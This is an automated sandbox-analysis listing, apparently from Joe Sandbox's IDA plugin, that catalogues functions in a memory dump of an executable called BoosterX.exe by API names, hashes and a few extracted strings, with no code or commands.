                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                     • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CapsDeviceRelease
                                                    • String ID:
                                                    • API String ID: 127614599-3916222277
                                                    • Opcode ID: a495d1c106870e0f0321fa1e920729909cda6ce65bb071f3320cbe7ab8d646f7
                                                    • Instruction ID: a95344d8d5066d0aa815e89dfcdf331b89c40bbc4075cdffbabb267147bfde83
                                                    • Opcode Fuzzy Hash: a495d1c106870e0f0321fa1e920729909cda6ce65bb071f3320cbe7ab8d646f7
                                                    • Instruction Fuzzy Hash: 48E0C220B08A4292FB086BBAF58A03A2261AB4CBD2F158435DA5FC77D4CF3CC4C54300
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                     • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                    • String ID:
                                                    • API String ID: 1137671866-0
                                                    • Opcode ID: 634f0027529a39f2956737d7ffa65a829bc6c39c8b9bd9b086ee47eb9c2cc145
                                                    • Instruction ID: 3fd5e4b724083df5e2e5cc0c5c02b19104240b703b6e604590590f7a0cdaf825
                                                    • Opcode Fuzzy Hash: 634f0027529a39f2956737d7ffa65a829bc6c39c8b9bd9b086ee47eb9c2cc145
                                                    • Instruction Fuzzy Hash: FAA1CF66A18A83A2EE20DF65E8441BD7361FB85785F400632EACDC7BA9DF3CE544C700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                     • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID:
                                                    • API String ID: 1452528299-0
                                                    • Opcode ID: 4d6045c8b408e668fa1133d078708eca6aecce9a2eefd03080f568449f648bad
                                                    • Instruction ID: 3c2c4b37c3a08220621b3e61f2ffb6bd22b9103f07a78f13c83b4d1f5743e8c8
                                                    • Opcode Fuzzy Hash: 4d6045c8b408e668fa1133d078708eca6aecce9a2eefd03080f568449f648bad
                                                    • Instruction Fuzzy Hash: CC519E62B14A43A9FB009F69D4552FC2361EB85B99F504236DA9CD7BAAEF2CD240C344
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                     • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                    • String ID:
                                                    • API String ID: 1077098981-0
                                                    • Opcode ID: 636cda63db5f50613c70694827d2b71a51838dc95d214f096266c0c3ed1ab69a
                                                    • Instruction ID: bbd5a56244b2bd74c7ff5cdaff58f420d4d44ab5b231fabe6f53435266873116
                                                    • Opcode Fuzzy Hash: 636cda63db5f50613c70694827d2b71a51838dc95d214f096266c0c3ed1ab69a
                                                    • Instruction Fuzzy Hash: FA515B32A18B43E6EB508F65E5447AE67A4FB85B86F500136EA8ED7B54DF3CD504CB00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                     • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                    • String ID:
                                                    • API String ID: 4141327611-0
                                                    • Opcode ID: a98e5aeb67f48d2f6f979bd70fbe768edfa1404fbf159e78b91cdf96afedf3b8
                                                    • Instruction ID: 0b36527c0e5d9fbc4fe290b5507e6340c71eb9f0542de6fe2968e320a26ab386
                                                    • Opcode Fuzzy Hash: a98e5aeb67f48d2f6f979bd70fbe768edfa1404fbf159e78b91cdf96afedf3b8
                                                    • Instruction Fuzzy Hash: CB417E71A0868366FF679F119044379A3A1EF90BA2F1542B3DACDC7B95DF2CE9418700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                     • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 3823481717-0
                                                    • Opcode ID: 4230d5988ea448787440b68bfd073e70abe7b21d56b24157a801639cdcef97c4
                                                    • Instruction ID: 82cff2c48c9a2027e445cd2c746b50e91e44cc6f30daac91f196ab006f1cc9e2
                                                    • Opcode Fuzzy Hash: 4230d5988ea448787440b68bfd073e70abe7b21d56b24157a801639cdcef97c4
                                                    • Instruction Fuzzy Hash: 9441AE62F14B53A4FB00CFB9E8851AC2372BB45BA9B101235DE9DEBB99DF78D045C240
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                     • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CreateDirectory$ErrorLast_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 2359106489-0
                                                    • Opcode ID: 27821a6842deb0aeb1942545e4d2e9236c0873fc3613091ef6fa8cf2280b892d
                                                    • Instruction ID: a2bb24b7eca653a7bf8d6e29ad122b41815f9151d9e55aec91fdccfe698a8960
                                                    • Opcode Fuzzy Hash: 27821a6842deb0aeb1942545e4d2e9236c0873fc3613091ef6fa8cf2280b892d
                                                    • Instruction Fuzzy Hash: FD31C062A0C683A1EA609F29A58527962A1FF897A2F540231EEDDCB7D5DF3CE4458600
                                                    APIs
                                                    • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6C038C3DB), ref: 00007FF6C0390B11
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6C038C3DB), ref: 00007FF6C0390B73
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF6C038C3DB), ref: 00007FF6C0390BAD
                                                    • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF6C038C3DB), ref: 00007FF6C0390BD7
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                     • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                    • String ID:
                                                    • API String ID: 1557788787-0
                                                    • Opcode ID: 57e6a8c8eb3660c1ef58ab29e04114fb274abfae31478a384663a9e2e76f5968
                                                    • Instruction ID: 9be77dcfa3922df6f20d2711c5f9f06a303fccdad859aec3c791344fc8ed5bc3
                                                    • Opcode Fuzzy Hash: 57e6a8c8eb3660c1ef58ab29e04114fb274abfae31478a384663a9e2e76f5968
                                                    • Instruction Fuzzy Hash: 11218231F19B9395EA209F16A440029B7A4FB98FD5B084635DECEE3B98DF3CE4528300
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                     • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                     • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$abort
                                                    • String ID:
                                                    • API String ID: 1447195878-0
                                                    • Opcode ID: 66754dd10562acfe9150f83282709bfe11e0b7c2362ae99d4c12b657f2a22dea
                                                    • Instruction ID: f3eab3000b98bab5b1156451e491ec1e78b651a64154677f5747f117d7b02282
                                                    • Opcode Fuzzy Hash: 66754dd10562acfe9150f83282709bfe11e0b7c2362ae99d4c12b657f2a22dea
                                                    • Instruction Fuzzy Hash: 16019E10B0920362FE5A6F32A65957812925F84792F1406BBD9DEC37DAEF3CF8458200
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: 659ac7cef5a6230f511b131fe25ef100f867fa9a2810ce63495c253f9cdf3390
                                                    • Instruction ID: 47acd2aa2de45ce1555090a8175dcba6426ffbda096cff3bd810b05a232a4a1f
                                                    • Opcode Fuzzy Hash: 659ac7cef5a6230f511b131fe25ef100f867fa9a2810ce63495c253f9cdf3390
                                                    • Instruction Fuzzy Hash: EEE0ED60E09A0792FF186F7AA8591352151AF48747F084839C85EC6390DF3CE1858610
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                    • String ID: DXGIDebug.dll
                                                    • API String ID: 3668304517-540382549
                                                    • Opcode ID: 52200f55740db99051fc736a5c90be683e68ee55df2891b50c708b4d95f4332b
                                                    • Instruction ID: b389ef9832a09b03fbb480cef821eddfe11accc8f006fb0b70505a0a00592165
                                                    • Opcode Fuzzy Hash: 52200f55740db99051fc736a5c90be683e68ee55df2891b50c708b4d95f4332b
                                                    • Instruction Fuzzy Hash: B871AC72A14B82A6EB14CF25E8443ADB3A5FB54B94F144226DFAC87BA5DF38D061C304
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo
                                                    • String ID: e+000$gfff
                                                    • API String ID: 3215553584-3030954782
                                                    • Opcode ID: f19aa8e360a5519298b9773b70f05fda243e234b3046621750ac1af24fd8595b
                                                    • Instruction ID: 31082d90bf88a50226712f85a7eb291cf84dd522759b9a67c2c321d63f6c1b6e
                                                    • Opcode Fuzzy Hash: f19aa8e360a5519298b9773b70f05fda243e234b3046621750ac1af24fd8595b
                                                    • Instruction Fuzzy Hash: B5510662B187C6A6E7259F3599413696A95EB81B91F0883B3C7DCCBBD6CF2CE444C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                    • String ID: SIZE
                                                    • API String ID: 449872665-3243624926
                                                    • Opcode ID: 242355a89709c4c5ea07838de1a7176d1d05b675bc8fc1010d8238fae86b5ddf
                                                    • Instruction ID: 42a1881ead331dcf45f3216f5fa82a0836626dadade6e9dff78d41d88c42b5a8
                                                    • Opcode Fuzzy Hash: 242355a89709c4c5ea07838de1a7176d1d05b675bc8fc1010d8238fae86b5ddf
                                                    • Instruction Fuzzy Hash: 4E418062A28683A5EE11DF28E4453B96361BB867A2F504233EBDDC67D6EF3CD541C700
                                                    APIs
                                                    Strings
                                                    • C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe, xrefs: 00007FF6C038C279
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: FileModuleName_invalid_parameter_noinfo
                                                    • String ID: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exe
                                                    • API String ID: 3307058713-3092362476
                                                    • Opcode ID: a0d8c3237379257ab40db39896a4593fde12318382e3262d4c43878eda6e4b0c
                                                    • Instruction ID: 9fef889c85ff7d83660706b54e362ba85f4df73ecac6c12b732f66b30140c815
                                                    • Opcode Fuzzy Hash: a0d8c3237379257ab40db39896a4593fde12318382e3262d4c43878eda6e4b0c
                                                    • Instruction Fuzzy Hash: 7841AC32A18A53AAEB15DF21A8401BC7794EF85BD5F548277EA8DC7B85DF3CE4428300
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ItemText$DialogWindow
                                                    • String ID: ASKNEXTVOL
                                                    • API String ID: 445417207-3402441367
                                                    • Opcode ID: ea63e8dc08ff62e6733d286245d57d075c34d51a0c1fdd9564288bf9b5656a5d
                                                    • Instruction ID: ebe62fc9992149c764212bb5363855d9f0d3d418445d7c2e3c8316fadb82d221
                                                    • Opcode Fuzzy Hash: ea63e8dc08ff62e6733d286245d57d075c34d51a0c1fdd9564288bf9b5656a5d
                                                    • Instruction Fuzzy Hash: D241C222B1CA83A1FA109F1AE5842B923A1EF89BC6F540136DECDD77A5CF3CE5418340
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide_snwprintf
                                                    • String ID: $%s$@%s
                                                    • API String ID: 2650857296-834177443
                                                    • Opcode ID: 92f7a5e5db808ff0627fb4716d8c563998de2da1c6043d31c744409d5dfbc019
                                                    • Instruction ID: e692a9d0fe0dc09ad84ff703d3f918a39908d09ed38bec33bfcdeea4348ca855
                                                    • Opcode Fuzzy Hash: 92f7a5e5db808ff0627fb4716d8c563998de2da1c6043d31c744409d5dfbc019
                                                    • Instruction Fuzzy Hash: 2C31CE72B19B87A6EA108F6AE5406E967A4FB45B85F401033EE8DC7B95EF3CE505C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: FileHandleType
                                                    • String ID: @
                                                    • API String ID: 3000768030-2766056989
                                                    • Opcode ID: 8946ec43ce519745a17379b38ab7ff34034f07d291e36c027c9943bde98f32e6
                                                    • Instruction ID: 90cec0a94c2596bc3725d386cb133a4f7a1035f5d3c79e86a60893140988abcf
                                                    • Opcode Fuzzy Hash: 8946ec43ce519745a17379b38ab7ff34034f07d291e36c027c9943bde98f32e6
                                                    • Instruction Fuzzy Hash: 07217C22A0CA9391EB658F2894901392651EB85B75F281377DABFDB7D4CF3DE881C240
                                                    APIs
                                                    • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C0381CBE), ref: 00007FF6C038403C
                                                    • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6C0381CBE), ref: 00007FF6C0384082
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1673676265.00007FF6C0351000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6C0350000, based on PE: true
                                                    • Associated: 00000004.00000002.1673652881.00007FF6C0350000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673716023.00007FF6C0398000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03AB000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1673763008.00007FF6C03B4000.00000004.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BA000.00000002.00000001.01000000.00000006.sdmp
                                                    • Associated: 00000004.00000002.1674968214.00007FF6C03BE000.00000002.00000001.01000000.00000006.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff6c0350000_BoosterX.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: 1d5db736ccfdc40490821f2c69de7fb41a1095ad17331bc3641baf3fc80bbebe
                                                    • Instruction ID: e2209c5055e370e9c93d3f72473524d34ee8e84a86b7c87e6dc4d90de2f78b2d
                                                    • Opcode Fuzzy Hash: 1d5db736ccfdc40490821f2c69de7fb41a1095ad17331bc3641baf3fc80bbebe
                                                    • Instruction Fuzzy Hash: 20114C72608B8292EB208F15E44026AB7A1FB88B95F184272DFCD87B68DF3CD551CB00
                                                    APIs
                                                    • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6C036E8DB,?,?,?,00007FF6C03645FA,?,?,?), ref: 00007FF6C036E9DF
